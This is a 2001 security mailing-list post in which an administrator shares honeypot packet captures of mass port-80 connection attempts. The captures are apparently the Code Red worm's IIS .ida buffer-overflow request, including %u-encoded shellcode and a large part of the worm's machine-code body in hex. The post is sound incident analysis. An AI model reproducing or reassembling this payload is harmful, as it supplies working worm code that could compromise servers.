Re: Strange web traffic

From: Scott Nursten (scott.nurstenat_private)
Date: Tue Jul 17 2001 - 11:37:57 PDT

    Sorry guys, on my way home, trying to rush out the door .... but before I go, I noticed this - I overlooked it earlier as I'm in quite a hurry. Having analysed it a bit better now (and actually getting a single stream as opposed to several thousand), you see this: 
    
    9:15:37.873583 217.86.214.81.4037 > 194.130.109.164.80: S [tcp sum ok] 3804761538:3804761538(0) win 8760 <mss 1460,nop,nop,sackOK> (DF) (ttl 116, id 49118, len 48)
    0x0000   4500 0030 bfde 4000 7406 671a d956 d651        E..0..@.t.g..V.Q
    0x0010   c282 6da4 0fc5 0050 e2c8 0dc2 0000 0000        ..m....P........
    0x0020   7002 2238 8078 0000 0204 05b4 0101 0402        p."8.x..........
    
    19:15:37.873625 194.130.109.164.80 > 217.86.214.81.4037: S [tcp sum ok] 79900976:79900976(0) ack 3804761539 win 5840 <mss 1460,nop,nop,sackOK> (DF) (ttl 64, id 0, len 48)
    0x0000   4500 0030 0000 4000 4006 5af9 c282 6da4        E..0..@.@.Z...m.
    0x0010   d956 d651 0050 0fc5 04c3 3130 e2c8 0dc3        .V.Q.P....10....
    0x0020   7012 16d0 55dc 0000 0204 05b4 0101 0402        p...U...........
    
    19:15:38.200238 217.86.214.81.4037 > 194.130.109.164.80: . [tcp sum ok] 1:1(0) ack 1 win 8760 (DF) (ttl 116, id 49162, len 40)
    0x0000   4500 0028 c00a 4000 7406 66f6 d956 d651        E..(..@.t.f..V.Q
    0x0010   c282 6da4 0fc5 0050 e2c8 0dc3 04c3 3131        ..m....P......11
    0x0020   5010 2238 7738 0000 6d78 0000 0003             P."8w8..mx....
    
    19:15:38.202867 217.86.214.81.4037 > 194.130.109.164.80: P [tcp sum ok] 1:5(4) ack 1 win 8760 (DF) (ttl 116, id 49163, len 44)
    0x0000   4500 002c c00b 4000 7406 66f1 d956 d651        E..,..@.t.f..V.Q
    0x0010   c282 6da4 0fc5 0050 e2c8 0dc3 04c3 3131        ..m....P......11
    0x0020   5018 2238 dbc6 0000 4745 5420 6540             P."8....GET.e@
    
    19:15:38.203063 194.130.109.164.80 > 217.86.214.81.4037: . [tcp sum ok] 1:1(0) ack 5 win 5840 (DF) (ttl 64, id 15641, len 40)
    0x0000   4500 0028 3d19 4000 4006 1de8 c282 6da4        E..(=.@.@.....m.
    0x0010   d956 d651 0050 0fc5 04c3 3131 e2c8 0dc7        .V.Q.P....11....
    0x0020   5010 16d0 829c 0000                            P.......
    
    19:15:38.404751 217.86.214.81.4037 > 194.130.109.164.80: P [tcp sum ok] 5:1465(1460) ack 1 win 8760 (DF) (ttl 116, id 49164, len 1500)
    0x0000   4500 05dc c00c 4000 7406 6140 d956 d651        E.....@.t.a@.V.Q
    0x0010   c282 6da4 0fc5 0050 e2c8 0dc7 04c3 3131        ..m....P......11
    0x0020   5018 2238 73c8 0000 2f64 6566 6175 6c74        P."8s.../default
    0x0030   2e69 6461 3f4e 4e4e 4e4e 4e4e 4e4e 4e4e        .ida?NNNNNNNNNNN
    0x0040   4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e        NNNNNNNNNNNNNNNN
    0x0050   4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e        NNNNNNNNNNNNNNNN
    0x0060   4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e        NNNNNNNNNNNNNNNN
    0x0070   4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e        NNNNNNNNNNNNNNNN
    0x0080   4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e        NNNNNNNNNNNNNNNN
    0x0090   4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e        NNNNNNNNNNNNNNNN
    0x00a0   4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e        NNNNNNNNNNNNNNNN
    0x00b0   4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e        NNNNNNNNNNNNNNNN
    0x00c0   4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e        NNNNNNNNNNNNNNNN
    0x00d0   4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e        NNNNNNNNNNNNNNNN
    0x00e0   4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e        NNNNNNNNNNNNNNNN
    0x00f0   4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e        NNNNNNNNNNNNNNNN
    0x0100   4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e 4e4e        NNNNNNNNNNNNNNNN
    0x0110   4e4e 4e4e 4e25 7539 3039 3025 7536 3835        NNNNN%u9090%u685
    0x0120   3825 7563 6264 3325 7537 3830 3125 7539        8%ucbd3%u7801%u9
    0x0130   3039 3025 7536 3835 3825 7563 6264 3325        090%u6858%ucbd3%
    0x0140   7537 3830 3125 7539 3039 3025 7536 3835        u7801%u9090%u685
    0x0150   3825 7563 6264 3325 7537 3830 3125 7539        8%ucbd3%u7801%u9
    0x0160   3039 3025 7539 3039 3025 7538 3139 3025        090%u9090%u8190%
    0x0170   7530 3063 3325 7530 3030 3325 7538 6230        u00c3%u0003%u8b0
    0x0180   3025 7535 3331 6225 7535 3366 6625 7530        0%u531b%u53ff%u0
    0x0190   3037 3825 7530 3030 3025 7530 303d 6120        078%u0000%u00=a.
    0x01a0   2048 5454 502f 312e 300d 0a43 6f6e 7465        .HTTP/1.0..Conte
    0x01b0   6e74 2d74 7970 653a 2074 6578 742f 786d        nt-type:.text/xm
    0x01c0   6c0a 484f 5354 3a77 7777 2e77 6f72 6d2e        l.HOST:www.worm.
    0x01d0   636f 6d0a 2041 6363 6570 743a 202a 2f2a        com..Accept:.*/*
    0x01e0   0a43 6f6e 7465 6e74 2d6c 656e 6774 683a        .Content-length:
    0x01f0   2033 3536 3920 0d0a 0d0a 558b ec81 ec18        .3569.....U.....
    0x0200   0200 0053 5657 8dbd e8fd ffff b986 0000        ...SVW..........
    0x0210   00b8 cccc cccc f3ab c785 70fe ffff 0000        ..........p.....
    0x0220   0000 e90a 0b00 008f 8568 feff ff8d bdf0        .........h......
    0x0230   feff ff64 a100 0000 0089 4708 6489 3d00        ...d......G.d.=.
    0x0240   0000 00e9 6f0a 0000 8f85 60fe ffff c785        ....o.....`.....
    0x0250   f0fe ffff ffff ffff 8b85 68fe ffff 83e8        ..........h.....
    0x0260   0789 85f4 feff ffc7 8558 feff ff00 00e0        .........X......
    0x0270   77e8 9b0a 0000 83bd 70fe ffff 000f 85dd        w.......p.......
    0x0280   0100 008b 8d58 feff ff81 c100 0001 0089        .....X..........
    0x0290   8d58 feff ff81 bd58 feff ff00 0000 7875        .X.....X......xu
    0x02a0   0ac7 8558 feff ff00 00f0 bf8b 9558 feff        ...X.........X..
    0x02b0   ff33 c066 8b02 3d4d 5a00 000f 859a 0100        .3.f..=MZ.......
    0x02c0   008b 8d58 feff ff8b 513c 8b85 58fe ffff        ...X....Q<..X...
    0x02d0   33c9 668b 0c10 81f9 5045 0000 0f85 7901        3.f.....PE....y.
    0x02e0   0000 8b95 58fe ffff 8b42 3c8b 8d58 feff        ....X....B<..X..
    0x02f0   ff8b 5401 7803 9558 feff ff89 9554 feff        ..T.x..X.....T..
    0x0300   ff8b 8554 feff ff8b 480c 038d 58fe ffff        ...T....H...X...
    0x0310   898d 4cfe ffff 8b95 4cfe ffff 813a 4b45        ..L.....L....:KE
    0x0320   524e 0f85 3301 0000 8b85 4cfe ffff 8178        RN..3.....L....x
    0x0330   0445 4c33 320f 8520 0100 008b 8d58 feff        .EL32........X..
    0x0340   ff89 8d34 feff ff8b 9554 feff ff8b 8558        ...4.....T.....X
    0x0350   feff ff03 4220 8985 4cfe ffff c785 48fe        ....B...L.....H.
    0x0360   ffff 0000 0000 eb1e 8b8d 48fe ffff 83c1        ..........H.....
    0x0370   0189 8d48 feff ff8b 954c feff ff83 c204        ...H.....L......
    0x0380   8995 4cfe ffff 8b85 54fe ffff 8b8d 48fe        ..L.....T.....H.
    0x0390   ffff 3b48 180f 8dc0 0000 008b 954c feff        ..;H.........L..
    0x03a0   ff8b 028b 8d58 feff ff81 3c01 4765 7450        .....X....<.GetP
    0x03b0   0f85 a000 0000 8b95 4cfe ffff 8b02 8b8d        ........L.......
    0x03c0   58fe ffff 817c 0104 726f 6341 0f85 8400        X....|..rocA....
    0x03d0   0000 8b95 48fe ffff 0395 48fe ffff 0395        ....H.....H.....
    0x03e0   58fe ffff 8b85 54fe ffff 8b48 2433 c066        X.....T....H$3.f
    0x03f0   8b04 0a89 854c feff ff8b 8d54 feff ff8b        .....L.....T....
    0x0400   5110 8b85 4cfe ffff 8d4c 10ff 898d 4cfe        Q...L....L....L.
    0x0410   ffff 8b95 4cfe ffff 0395 4cfe ffff 0395        ....L.....L.....
    0x0420   4cfe ffff 0395 4cfe ffff 0395 58fe ffff        L.....L.....X...
    0x0430   8b85 54fe ffff 8b48 1c8b 140a 8995 4cfe        ..T....H......L.
    0x0440   ffff 8b85 4cfe ffff 0385 58fe ffff 8985        ....L.....X.....
    0x0450   70fe ffff eb05 e90d ffff ffe9 16fe ffff        p...............
    0x0460   8dbd f0fe ffff 8b47 0864 a300 0000 0083        .......G.d......
    0x0470   bd70 feff ff00 7505 e938 0800 00c7 854c        .p....u..8.....L
    0x0480   feff ff01 0000 00eb 0f8b 8d4c feff ff83        ...........L....
    0x0490   c101 898d 4cfe ffff 8b95 68fe ffff 0fbe        ....L.....h.....
    0x04a0   0285 c00f 848d 0000 008b 8d68 feff ff0f        ...........h....
    0x04b0   be11 83fa 0975 218b 8568 feff ff83 c001        .....u!..h......
    0x04c0   8bf4 50ff 9590 feff ff3b f490 434b 434b        ..P......;..CKCK
    0x04d0   8985 34fe ffff eb2a 8bf4 8b8d 68fe ffff        ..4....*....h...
    0x04e0   518b 9534 feff ff52 ff95 70fe ffff 3bf4        Q..4...R..p...;.
    0x04f0   9043 4b43 4b8b 8d4c feff ff89 848d 8cfe        .CKCK..L........
    0x0500   ffff eb0f 8b95 68fe ffff 83c2 0189 9568        ......h........h
    0x0510   feff ff8b 8568 feff ff0f be08 85c9 7402        .....h........t.
    0x0520   ebe2 8b95 68fe ffff 83c2 0189 9568 feff        ....h........h..
    0x0530   ffe9 53ff ffff 8b85 68fe ffff 83c0 0189        ..S.....h.......
    0x0540   8568 feff ff8b 4d08 8b91 8400 0000 8995        .h....M.........
    0x0550   6cfe ffff c785 4cfe ffff 0400 0000 c685        l.....L.........
    0x0560   d0fe ffff 688b 4508 8985 d1fe ffff c785        ....h.E.........
    0x0570   d5fe ffff 5b53 53ff c785 d9fe ffff 6378        ....[SS.......cx
    0x0580   9090 8b4d 088b 5110 8995 50fe ffff 83bd        ...M..Q...P.....
    0x0590   50fe ffff 0075 268b f46a 008d 854c feff        P....u&..j...L..
    0x05a0   ff50 8b8d 68fe ffff 518b 5508 8b42 0850        .P..h...Q.U..B.P
    0x05b0   ff95 6cfe ffff 3bf4 9043 4b43 4b83 bd50        ..l...;..CKCK..P
    0x05c0   feff ff64 7d5c 8b8d 50fe ffff 83c1 0189        ...d}\..P.......
    0x05d0   8d50 feff ff8b 9550 feff ff69                  .P.....P...i
    
    19:15:38.404825 194.130.109.164.80 > 217.86.214.81.4037: . [tcp sum ok] 1:1(0) ack 1465 win 8760 (DF) (ttl 64, id 15642, len 40)
    0x0000   4500 0028 3d1a 4000 4006 1de7 c282 6da4        E..(=.@.@.....m.
    0x0010   d956 d651 0050 0fc5 04c3 3131 e2c8 137b        .V.Q.P....11...{
    0x0020   5010 2238 7180 0000                            P."8q...
    
    19:15:38.405121 194.130.109.164.80 > 217.86.214.81.4037: P [tcp sum ok] 1:500(499) ack 1465 win 8760 (DF) (ttl 64, id 15643, len 539)
    0x0000   4500 021b 3d1b 4000 4006 1bf3 c282 6da4        E...=.@.@.....m.
    0x0010   d956 d651 0050 0fc5 04c3 3131 e2c8 137b        .V.Q.P....11...{
    0x0020   5018 2238 4829 0000 4854 5450 2f31 2e31        P."8H)..HTTP/1.1
    0x0030   2034 3030 2042 6164 2052 6571 7565 7374        .400.Bad.Request
    0x0040   0d0a 4461 7465 3a20 5475 652c 2031 3720        ..Date:.Tue,.17.
    0x0050   4a75 6c20 3230 3031 2031 383a 3135 3a33        Jul.2001.18:15:3
    0x0060   3820 474d 540d 0a53 6572 7665 723a 2041        8.GMT..Server:.A
    0x0070   7061 6368 652f 312e 332e 3230 2028 556e        pache/1.3.20.(Un
    0x0080   6978 2920 5048 502f 342e 302e 360d 0a43        ix).PHP/4.0.6..C
    0x0090   6f6e 6e65 6374 696f 6e3a 2063 6c6f 7365        onnection:.close
    0x00a0   0d0a 436f 6e74 656e 742d 5479 7065 3a20        ..Content-Type:.
    0x00b0   7465 7874 2f68 746d 6c3b 2063 6861 7273        text/html;.chars
    0x00c0   6574 3d69 736f 2d38 3835 392d 310d 0a0d        et=iso-8859-1...
    0x00d0   0a3c 2144 4f43 5459 5045 2048 544d 4c20        .<!DOCTYPE.HTML.
    0x00e0   5055 424c 4943 2022 2d2f 2f49 4554 462f        PUBLIC."-//IETF/
    0x00f0   2f44 5444 2048 544d 4c20 322e 302f 2f45        /DTD.HTML.2.0//E
    0x0100   4e22 3e0a 3c48 544d 4c3e 3c48 4541 443e        N">.<HTML><HEAD>
    0x0110   0a3c 5449 544c 453e 3430 3020 4261 6420        .<TITLE>400.Bad.
    0x0120   5265 7175 6573 743c 2f54 4954 4c45 3e0a        Request</TITLE>.
    0x0130   3c2f 4845 4144 3e3c 424f 4459 3e0a 3c48        </HEAD><BODY>.<H
    0x0140   313e 4261 6420 5265 7175 6573 743c 2f48        1>Bad.Request</H
    0x0150   313e 0a59 6f75 7220 6272 6f77 7365 7220        1>.Your.browser.
    0x0160   7365 6e74 2061 2072 6571 7565 7374 2074        sent.a.request.t
    0x0170   6861 7420 7468 6973 2073 6572 7665 7220        hat.this.server.
    0x0180   636f 756c 6420 6e6f 7420 756e 6465 7273        could.not.unders
    0x0190   7461 6e64 2e3c 503e 0a43 6c69 656e 7420        tand.<P>.Client.
    0x01a0   7365 6e74 206d 616c 666f 726d 6564 2048        sent.malformed.H
    0x01b0   6f73 7420 6865 6164 6572 3c50 3e0a 3c48        ost.header<P>.<H
    0x01c0   523e 0a3c 4144 4452 4553 533e 4170 6163        R>.<ADDRESS>Apac
    0x01d0   6865 2f31 2e33 2e32 3020 5365 7276 6572        he/1.3.20.Server
    0x01e0   2061 7420 7469 7461 6e69 612e 696e 6672        .at.titania.infr
    0x01f0   6f6e 742e 636f 2e75 6b20 506f 7274 2038        ont.co.uk.Port.8
    0x0200   303c 2f41 4444 5245 5353 3e0a 3c2f 424f        0</ADDRESS>.</BO
    0x0210   4459 3e3c 2f48 544d 4c3e 0a                    DY></HTML>.
    
    19:15:38.405193 194.130.109.164.80 > 217.86.214.81.4037: F [tcp sum ok] 500:500(0) ack 1465 win 8760 (DF) (ttl 64, id 15644, len 40)
    0x0000   4500 0028 3d1c 4000 4006 1de5 c282 6da4        E..(=.@.@.....m.
    0x0010   d956 d651 0050 0fc5 04c3 3324 e2c8 137b        .V.Q.P....3$...{
    0x0020   5011 2238 6f8c 0000                            P."8o...
    
    19:15:38.950063 217.86.214.81.4037 > 194.130.109.164.80: . [tcp sum ok] 1465:2925(1460) ack 1 win 8760 (DF) (ttl 116, id 49212, len 1500)
    0x0000   4500 05dc c03c 4000 7406 6110 d956 d651        E....<@.t.a..V.Q
    0x0010   c282 6da4 0fc5 0050 e2c8 137b 04c3 3131        ..m....P...{..11
    0x0020   5010 2238 e9b2 0000 d28d 66f0 5089 9574        P."8......f.P..t
    0x0030   feff ff8b 4508 8b8d 50fe ffff 8948 108b        ....E...P....H..
    0x0040   f48d 952c feff ff52 6a00 8d85 4cfe ffff        ...,...Rj...L...
    0x0050   508d 8dd0 feff ff51 6a00 6a00 ff95 98fe        P......Qj.j.....
    0x0060   ffff 3bf4 9043 4b43 4be9 9f01 0000 8bf4        ..;..CKCK.......
    0x0070   ff95 a4fe ffff 3bf4 9043 4b43 4b89 854c        ......;..CKCK..L
    0x0080   feff ff8b 954c feff ff81 e2ff ff00 0089        .....L..........
    0x0090   954c feff ff81 bd4c feff ff09 0400 0074        .L.....L.......t
    0x00a0   05e9 6701 0000 8bf4 6800 dd6d 00ff 95a0        ..g.....h..m....
    0x00b0   feff ff3b f490 434b 434b e980 0600 008f        ...;..CKCK......
    0x00c0   854c feff ff8b 8534 feff ff89 85cc feff        .L.....4........
    0x00d0   ff8b 8d4c feff ff8b 95b0 feff ff89 118b        ...L............
    0x00e0   854c feff ff8b 8dc8 feff ff89 4804 8b95        .L..........H...
    0x00f0   68fe ffff 8995 50fe ffff eb0f 8b85 50fe        h.....P.......P.
    0x0100   ffff 83c0 0189 8550 feff ff8b 8d68 feff        .......P.....h..
    0x0110   ff81 c100 0100 0039 8d50 feff ff73 128b        .......9.P...s..
    0x0120   9550 feff ff81 3a4c 4d54 4875 02eb 02eb        .P....:LMTHu....
    0x0130   cb8b 8550 feff ff83 c004 8b8d 4cfe ffff        ...P........L...
    0x0140   8941 088b f48d 9548 feff ff52 6a04 6800        .A.....H...Rj.h.
    0x0150   4000 008b 85cc feff ff50 ff95 a8fe ffff        @........P......
    0x0160   3bf4 9043 4b43 4bc7 854c feff ff00 0000        ;..CKCK..L......
    0x0170   00eb 0f8b 8d4c feff ff83 c101 898d 4cfe        .....L........L.
    0x0180   ffff 81bd 4cfe ffff 0030 0000 7d56 8b95        ....L....0..}V..
    0x0190   ccfe ffff 0395 4cfe ffff 8b02 3b85 b0fe        ......L.....;...
    0x01a0   ffff 753e 8b8d ccfe ffff 038d 4cfe ffff        ..u>........L...
    0x01b0   8b95 60fe ffff 8911 8bf4 6800 5125 02ff        ..`.......h.Q%..
    0x01c0   95a0 feff ff3b f490 434b 434b 8b85 ccfe        .....;..CKCK....
    0x01d0   ffff 0385 4cfe ffff 8b8d b0fe ffff 8908        ....L...........
    0x01e0   eb02 eb8f 8bf4 8d95 4cfe ffff 528b 8548        ........L...R..H
    0x01f0   feff ff50 6800 4000 008b 8dcc feff ff51        ...Ph.@........Q
    0x0200   ff95 a8fe ffff 3bf4 9043 4b43 4bba 0100        ......;..CKCK...
    0x0210   0000 85d2 0f84 e704 0000 8bf4 6a00 6880        ............j.h.
    0x0220   0000 006a 036a 006a 0168 0000 0080 8b85        ...j.j.j.h......
    0x0230   68fe ffff 83c0 6350 ff95 9cfe ffff 3bf4        h.....cP......;.
    0x0240   9043 4b43 4b89 8530 feff ff83 bd30 feff        .CKCK..0.....0..
    0x0250   ffff 741f b901 0000 0085 c974 168b f468        ..t........t...h
    0x0260   ffff ff7f ff95 a0fe ffff 3bf4 9043 4b43        ..........;..CKC
    0x0270   4beb e18b f48d 9538 feff ff52 ff95 94fe        K......8...R....
    0x0280   ffff 3bf4 9043 4b43 4b8b 853e feff ff89        ..;..CKCK..>....
    0x0290   854c feff ff8b 8d4c feff ff81 e1ff ff00        .L.....L........
    0x02a0   0089 8d4c feff ff83 bd4c feff ff14 0f8c        ...L.....L......
    0x02b0   4701 0000 ba01 0000 0085 d20f 843a 0100        G............:..
    0x02c0   008b f48d 8538 feff ff50 ff95 94fe ffff        .....8...P......
    0x02d0   3bf4 9043 4b43 4b8b 8d3e feff ff89 8d4c        ;..CKCK..>.....L
    0x02e0   feff ff8b 954c feff ff81 e2ff ff00 0089        .....L..........
    0x02f0   954c feff ff83 bd4c feff ff1c 7c1f b801        .L.....L....|...
    0x0300   0000 0085 c074 168b f468 ffff ff7f ff95        .....t...h......
    0x0310   a0fe ffff 3bf4 9043 4b43 4beb e18b f46a        ....;..CKCK....j
    0x0320   64ff 95a0 feff ff3b f490 434b 434b 8bf4        d......;..CKCK..
    0x0330   6a00 6a01 6a02 ff95 b8fe ffff 3bf4 9043        j.j.j.......;..C
    0x0340   4b43 4b89 8578 feff ff66 c785 7cfe ffff        KCK..x...f..|...
    0x0350   0200 66c7 857e feff ff00 50c7 8580 feff        ..f..~....P.....
    0x0360   ffc6 89f0 5b8b f46a 108d 8d7c feff ff51        ....[..j...|...Q
    0x0370   8b95 78fe ffff 52ff 95bc feff ff3b f490        ..x...R......;..
    0x0380   434b 434b c785 4cfe ffff 0000 0000 eb0f        CKCK..L.........
    0x0390   8b85 4cfe ffff 83c0 0189 854c feff ff81        ..L........L....
    0x03a0   bd4c feff ff00 8001 007d 378b f468 e803        .L.......}7..h..
    0x03b0   0000 ff95 a0fe ffff 3bf4 9043 4b43 4b8b        ........;..CKCK.
    0x03c0   f46a 006a 018d 8dfc feff ff51 8b95 78fe        .j.j.......Q..x.
    0x03d0   ffff 52ff 95c0 feff ff3b f490 434b 434b        ..R......;..CKCK
    0x03e0   ebae 8bf4 6800 0000 01ff 95a0 feff ff3b        ....h..........;
    0x03f0   f490 434b 434b e9b9 feff ff8b 8544 feff        ..CKCK.......D..
    0x0400   ff89 8550 feff ff8b 8d50 feff ff0f af8d        ...P.....P......
    0x0410   50fe ffff 69c9 e359 cd00 8b95 50fe ffff        P...i..Y....P...
    0x0420   69d2 b9e1 0100 8b85 74fe ffff 03c1 03d0        i.......t.......
    0x0430   8995 50fe ffff 8b8d 74fe ffff 69c9 8333        ..P.....t...i..3
    0x0440   cf00 81c1 53fe 6b07 898d 74fe ffff 8b95        ....S.k...t.....
    0x0450   74fe ffff 81e2 ff00 0000 8995 50fe ffff        t...........P...
    0x0460   83bd 50fe ffff 7f74 0c81 bd50 feff ffe0        ..P....t...P....
    0x0470   0000 0075 118b 8574 feff ff05 a90d 0200        ...u...t........
    0x0480   8985 74fe ffff 8bf4 6a64 ff95 a0fe ffff        ..t.....jd......
    0x0490   3bf4 9043 4b43 4b8b f46a 006a 016a 02ff        ;..CKCK..j.j.j..
    0x04a0   95b8 feff ff3b f490 434b 434b 8985 78fe        .....;..CKCK..x.
    0x04b0   ffff 66c7 857c feff ff02 0066 c785 7efe        ..f..|.....f..~.
    0x04c0   ffff 0050 8b8d 74fe ffff 898d 80fe ffff        ...P..t.........
    0x04d0   8bf4 6a10 8d95 7cfe ffff 528b 8578 feff        ..j...|...R..x..
    0x04e0   ff50 ff95 bcfe ffff 3bf4 9043 4b43 4b85        .P......;..CKCK.
    0x04f0   c00f 85ef 0100 008b f46a 006a 048b 8d68        .........j.j...h
    0x0500   feff ff51 8b95 78fe ffff 52ff 95c0 feff        ...Q..x...R.....
    0x0510   ff3b f490 434b 434b c785 4cfe ffff 0000        .;..CKCK..L.....
    0x0520   0000 8b45 088b 4868 898d 64fe ffff eb1e        ...E..Hh..d.....
    0x0530   8b95 64fe ffff 83c2 0189 9564 feff ff8b        ..d........d....
    0x0540   854c feff ff83 c001 8985 4cfe ffff 8b8d        .L........L.....
    0x0550   64fe ffff 0fbe 1185 d274 02eb d38b f46a        d........t.....j
    0x0560   008b 854c feff ff50 8b4d 088b 5168 528b        ...L...P.M..QhR.
    0x0570   8578 feff ff50 ff95 c0fe ffff 3bf4 9043        .x...P......;..C
    0x0580   4b43 4b8b f46a 006a 018b 8d68 feff ff83        KCK..j.j...h....
    0x0590   c105 518b 9578 feff ff52 ff95 c0fe ffff        ..Q..x...R......
    0x05a0   3bf4 9043 4b43 4bc7 854c feff ff00 0000        ;..CKCK..L......
    0x05b0   008b 4508 8b48 6489 8d64 feff ffeb 1e8b        ..E..Hd..d......
    0x05c0   9564 feff ff83 c201 8995 64fe ffff 8b85        .d........d.....
    0x05d0   4cfe ffff 83c0 0189 854c feff                  L........L..
    
    19:15:38.986071 194.130.109.164.80 > 217.86.214.81.4037: . [tcp sum ok] 501:501(0) ack 2925 win 11680 (DF) (ttl 64, id 15645, len 40)
    0x0000   4500 0028 3d1d 4000 4006 1de4 c282 6da4        E..(=.@.@.....m.
    0x0010   d956 d651 0050 0fc5 04c3 3325 e2c8 192f        .V.Q.P....3%.../
    0x0020   5010 2da0 5e70 0000                            P.-.^p..
    
    Then the packet below. I caught the one below first for obvious reasons: "Hacked By Chinese". :) That's pretty much the whole stream (bar the bye-byes).
    
    HTH some more. 
    
    Rgds,
    
    Scott
    
    Scott Nursten wrote:
    > 
    > Hi guys,
    > 
    > From Thursday last week, I have had thousands (21296) of attempted connects from thousands (7650) of hosts to port 80 on a host on my network that does not have a web server running. I decided to open this up on my firewall and setup a small honeypot to see what the traffic was about. Lo and behold:
    > 
    > 18:59:07.487672 210.239.180.224.32769 > 194.130.109.164.80: P [tcp sum ok] 2925:4040(1115) ack 1 win 17520 (DF) (ttl 104, id 46743, len 1155)
    > 0x0000   4500 0483 b697 4000 6806 9fe6 d2ef b4e0        E.....@.h.......
    > 0x0010   c282 6da4 8001 0050 c56d 3b34 c6fa 9e83        ..m....P.m;4....
    > 0x0020   5018 4470 5da3 0000 ff8b 8d64 feff ff0f        P.Dp]......d....
    > 0x0030   be11 85d2 7402 ebd3 8bf4 6a00 8b85 4cfe        ....t.....j...L.
    > 0x0040   ffff 508b 4d08 8b51 6452 8b85 78fe ffff        ..P.M..QdR..x...
    > 0x0050   50ff 95c0 feff ff3b f490 434b 434b c785        P......;..CKCK..
    > 0x0060   4cfe ffff 0000 0000 8b8d 68fe ffff 83c1        L.........h.....
    > 0x0070   0789 8d64 feff ffeb 1e8b 9564 feff ff83        ...d.......d....
    > 0x0080   c201 8995 64fe ffff 8b85 4cfe ffff 83c0        ....d.....L.....
    > 0x0090   0189 854c feff ff8b 8d64 feff ff0f be11        ...L.....d......
    > 0x00a0   85d2 7402 ebd3 8bf4 6a00 8b85 4cfe ffff        ..t.....j...L...
    > 0x00b0   508b 8d68 feff ff83 c107 518b 9578 feff        P..h......Q..x..
    > 0x00c0   ff52 ff95 c0fe ffff 3bf4 9043 4b43 4b8b        .R......;..CKCK.
    > 0x00d0   4508 8b48 7089 8d4c feff ff8b f46a 008b        E..Hp..L.....j..
    > 0x00e0   954c feff ff52 8b45 088b 4878 518b 9578        .L...R.E..HxQ..x
    > 0x00f0   feff ff52 ff95 c0fe ffff 3bf4 9043 4b43        ...R......;..CKC
    > 0x0100   4bc6 85fc feff ff00 8bf4 6a00 6800 0100        K.........j.h...
    > 0x0110   008d 85fc feff ff50 8b8d 78fe ffff 51ff        .......P..x...Q.
    > 0x0120   95c4 feff ff3b f490 434b 434b 8985 4cfe        .....;..CKCK..L.
    > 0x0130   ffff 8bf4 8b95 78fe ffff 52ff 95c8 feff        ......x...R.....
    > 0x0140   ff3b f490 434b 434b e90c fbff ffeb fee8        .;..CKCK........
    > 0x0150   8cf5 ffff eb30 5883 c005 5557 5356 506a        .....0X...UWSVPj
    > 0x0160   3c8b f083 c60c 5668 0001 0000 ff70 08ff        <.....Vh.....p..
    > 0x0170   7424 28ff 1058 50ff 7424 18ff 5004 585e        t$(..XP.t$..P.X^
    > 0x0180   5b5f 5dff 2090 e8cb ffff ffe8 7bf9 ffff        [_].........{...
    > 0x0190   b878 5634 12b8 7856 3412 b878 5634 12b8        .xV4..xV4..xV4..
    > 0x01a0   7856 3412 b878 5634 1258 508b bd68 feff        xV4..xV4.XP..h..
    > 0x01b0   ff89 47f2 c38b 4424 0c05 b800 0000 c700        ..G...D$........
    > 0x01c0   2aa8 4c00 33c0 c3eb ece8 f1f4 ffff 4c6f        *.L.3.........Lo
    > 0x01d0   6164 4c69 6272 6172 7941 0047 6574 5379        adLibraryA.GetSy
    > 0x01e0   7374 656d 5469 6d65 0043 7265 6174 6554        stemTime.CreateT
    > 0x01f0   6872 6561 6400 4372 6561 7465 4669 6c65        hread.CreateFile
    > 0x0200   4100 536c 6565 7000 4765 7453 7973 7465        A.Sleep.GetSyste
    > 0x0210   6d44 6566 6175 6c74 4c61 6e67 4944 0056        mDefaultLangID.V
    > 0x0220   6972 7475 616c 5072 6f74 6563 7400 0969        irtualProtect..i
    > 0x0230   6e66 6f63 6f6d 6d2e 646c 6c00 5463 7053        nfocomm.dll.TcpS
    > 0x0240   6f63 6b53 656e 6400 0957 5332 5f33 322e        ockSend..WS2_32.
    > 0x0250   646c 6c00 736f 636b 6574 0063 6f6e 6e65        dll.socket.conne
    > 0x0260   6374 0073 656e 6400 7265 6376 0063 6c6f        ct.send.recv.clo
    > 0x0270   7365 736f 636b 6574 0009 7733 7376 632e        sesocket..w3svc.
    > 0x0280   646c 6c00 0047 4554 2000 3f00 2020 4854        dll..GET..?...HT
    > 0x0290   5450 2f31 2e30 0d0a 436f 6e74 656e 742d        TP/1.0..Content-
    > 0x02a0   7479 7065 3a20 7465 7874 2f78 6d6c 0a48        type:.text/xml.H
    > 0x02b0   4f53 543a 7777 772e 776f 726d 2e63 6f6d        OST:www.worm.com
    > 0x02c0   0a20 4163 6365 7074 3a20 2a2f 2a0a 436f        ..Accept:.*/*.Co
    > 0x02d0   6e74 656e 742d 6c65 6e67 7468 3a20 3335        ntent-length:.35
    > 0x02e0   3639 200d 0a0d 0a00 633a 5c6e 6f74 776f        69......c:\notwo
    > 0x02f0   726d 004c 4d54 480d 0a3c 6874 6d6c 3e3c        rm.LMTH..<html><
    > 0x0300   6865 6164 3e3c 6d65 7461 2068 7474 702d        head><meta.http-
    > 0x0310   6571 7569 763d 2243 6f6e 7465 6e74 2d54        equiv="Content-T
    > 0x0320   7970 6522 2063 6f6e 7465 6e74 3d22 7465        ype".content="te
    > 0x0330   7874 2f68 746d 6c3b 2063 6861 7273 6574        xt/html;.charset
    > 0x0340   3d65 6e67 6c69 7368 223e 3c74 6974 6c65        =english"><title
    > 0x0350   3e48 454c 4c4f 213c 2f74 6974 6c65 3e3c        >HELLO!</title><
